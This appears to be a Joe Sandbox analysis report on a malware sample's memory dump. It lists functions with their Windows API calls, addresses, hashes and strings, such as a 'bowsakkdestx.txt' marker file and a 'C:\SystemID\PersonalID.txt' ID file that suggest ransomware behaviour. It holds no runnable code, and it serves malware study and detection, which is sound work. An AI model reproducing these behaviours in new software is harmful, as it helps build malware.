                                                                                                        • Instruction Fuzzy Hash: 5BF0B2B0C0430C9BEB01DFD1DA197DEBBB4BB08308F104249D8187A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F0C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F0C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: c672e4bb364386221ee352b4e72c5a1d9e2904cd2797f2411e7fcf23f3538d8f
                                                                                                        • Instruction ID: d163d0b5fc2043239eadba521c654649874cff1ba0cc9fbad1fe3304b6e0065e
                                                                                                        • Opcode Fuzzy Hash: c672e4bb364386221ee352b4e72c5a1d9e2904cd2797f2411e7fcf23f3538d8f
                                                                                                        • Instruction Fuzzy Hash: C7E08675A4031C67EB20EBA0ED8BFD9776CAB04B01F000091FB4CD30D1D6B0E5896AD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F3C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F3C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F3C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00F3C0ED,?,00BFBBEF,00000003), ref: 00F3C709
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00F3C0ED,?,00BFBBEF,00000003), ref: 00F3C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 32bd9f9a2578f62a54fe7b69ccd9c1e6f35965716903ede268bbd32bb73cb62f
                                                                                                        • Instruction ID: 958b5bbfb07505c705c1ff8c81d069e0a7f1e1915e0c4ba36c67e8636c04e2d3
                                                                                                        • Opcode Fuzzy Hash: 32bd9f9a2578f62a54fe7b69ccd9c1e6f35965716903ede268bbd32bb73cb62f
                                                                                                        • Instruction Fuzzy Hash: 5031CF31A00256EFDB218F75CC45BAA7BA9FF41330F158529E859AB1A0E731E850FBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00F0F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F0F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F0F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F0F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        • Opcode ID: c47af9d522c1d7818cf2269e154cf990ee6563a00041bd12d37f21e6d0fcd596
                                                                                                        • Instruction ID: 3e1483357ca61b249abb4bffc4b0610983d75c1eaded08b646a64a40dd7ad05b
                                                                                                        • Opcode Fuzzy Hash: c47af9d522c1d7818cf2269e154cf990ee6563a00041bd12d37f21e6d0fcd596
                                                                                                        • Instruction Fuzzy Hash: A5312632D00209EBDB149F68DC4ABEE7B78EF05714F508128F805A75C0D7756A49EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00FC7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FC70AB
                                                                                                          • Part of subcall function 00FC77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FC77D2
                                                                                                          • Part of subcall function 00FC77A0: ___AdjustPointer.LIBCMT ref: 00FC77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FC70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FC70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FC70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction ID: 4104e716c17c218175c20b4b97f44982a419429ef32eff9de5d305485f38f937
                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction Fuzzy Hash: 0C01DB3240420ABBCF126F55CD02FDA7F66EF48754F154019F91866121D375E961EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F25007: __getptd_noexit.LIBCMT ref: 00F25008
                                                                                                          • Part of subcall function 00F25007: __amsg_exit.LIBCMT ref: 00F25015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F25A01
                                                                                                          • Part of subcall function 00F28C96: __calloc_impl.LIBCMT ref: 00F28CA5
                                                                                                        • __lock.LIBCMT ref: 00F25A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F25A43
                                                                                                        • __lock.LIBCMT ref: 00F25A57
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        • Opcode ID: 372fe2eeba3f967940f19479b80359ae9d4a03d5b5670f4c0e2ce736456f29a4
                                                                                                        • Instruction ID: 59fb643cf3d12f71fb5e1ff8149873b557500bcf83684558f3e0b80bc25b814b
                                                                                                        • Opcode Fuzzy Hash: 372fe2eeba3f967940f19479b80359ae9d4a03d5b5670f4c0e2ce736456f29a4
                                                                                                        • Instruction Fuzzy Hash: 2A014071542760DBD720FFA8AC47B1D77A09F41B70F204249F4A59B2C6CE7C5941AE61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction ID: 7c93822a8e8361be5410d0815428ab0454b69d9eedb2169958fe2846d72ece10
                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction Fuzzy Hash: C5010B7240028EBBCF125E84CC428EE3F66BB29355B588455FE1959131DA3AC9B2BB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F127B9
                                                                                                        • _malloc.LIBCMT ref: 00F127C3
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _memset.LIBCMT ref: 00F127CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F127E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 600be51b88979aec4da7ca858aaa2ac7709273239a820d51b4bebf7e68b94b1c
                                                                                                        • Instruction ID: 5481b668a73567dc619dd80d4328b77facc961f625e47bf310278129a7b8f37d
                                                                                                        • Opcode Fuzzy Hash: 600be51b88979aec4da7ca858aaa2ac7709273239a820d51b4bebf7e68b94b1c
                                                                                                        • Instruction Fuzzy Hash: B2F02736741218BBE72066659C4BFBB769DEB86760F100125FA08E32C2E9512D0162F1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F12806
                                                                                                        • _malloc.LIBCMT ref: 00F12814
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _memset.LIBCMT ref: 00F1281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F12832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        • Opcode ID: 49ca3a25eb0387db2fd7676c3bf4e80c37e6a1f1fea7debb7a1930e89fba4874
                                                                                                        • Instruction ID: a2fd588b7da28768136578c002897ce66fb393c9231cf9b7272121b5bdaa8fc6
                                                                                                        • Opcode Fuzzy Hash: 49ca3a25eb0387db2fd7676c3bf4e80c37e6a1f1fea7debb7a1930e89fba4874
                                                                                                        • Instruction Fuzzy Hash: 23E086767411387BE51023597C8FFAB761CCBC27A5F100115F615D22D38A951C0191F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F14920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 7274dd55b2795a4d55dda06616a4e096840f958fa2f130b09d8e6d8a83dee166
                                                                                                        • Instruction ID: 84e07fe87bfb8f5849557691ff2845cd6c88e1ba9c75b7e1d0e0720b0cf60b88
                                                                                                        • Opcode Fuzzy Hash: 7274dd55b2795a4d55dda06616a4e096840f958fa2f130b09d8e6d8a83dee166
                                                                                                        • Instruction Fuzzy Hash: 69C13671704209DBCB28CF58D8C0AAAB3B6FFC4300B20456DE8468B655DB35FD95EBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F70040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                        • Opcode ID: 2c9179d40682a4d09fff1dc415321e145c3dd6cefb48c4a1e40ae628d3079eca
                                                                                                        • Instruction ID: 9e38d0290b12d8afd63bfc5b62e81c3d0a49f39ac32db45a2fb9cd1f34f7af79
                                                                                                        • Opcode Fuzzy Hash: 2c9179d40682a4d09fff1dc415321e145c3dd6cefb48c4a1e40ae628d3079eca
                                                                                                        • Instruction Fuzzy Hash: 3751C471B44306A7E7306EA6AC82F777798DF41B74F04442AFA1CD5182EEA5E844B273
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 40ad24ee2cc86d14dd1d2979b71b077cd0dd22ab0391f2e53f42af94dc62a7a2
                                                                                                        • Instruction ID: e5f3494143be851e813bf518c7325089e72ba3ceb1eaa85313947a02e077b404
                                                                                                        • Opcode Fuzzy Hash: 40ad24ee2cc86d14dd1d2979b71b077cd0dd22ab0391f2e53f42af94dc62a7a2
                                                                                                        • Instruction Fuzzy Hash: D1110172E003199BDF30DF68DC5279E7BA0AF00324F040629FD5A52291E37A9958BBC3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F80620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F80686
                                                                                                          • Part of subcall function 00F54C00: _raise.LIBCMT ref: 00F54C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F8062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F80638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
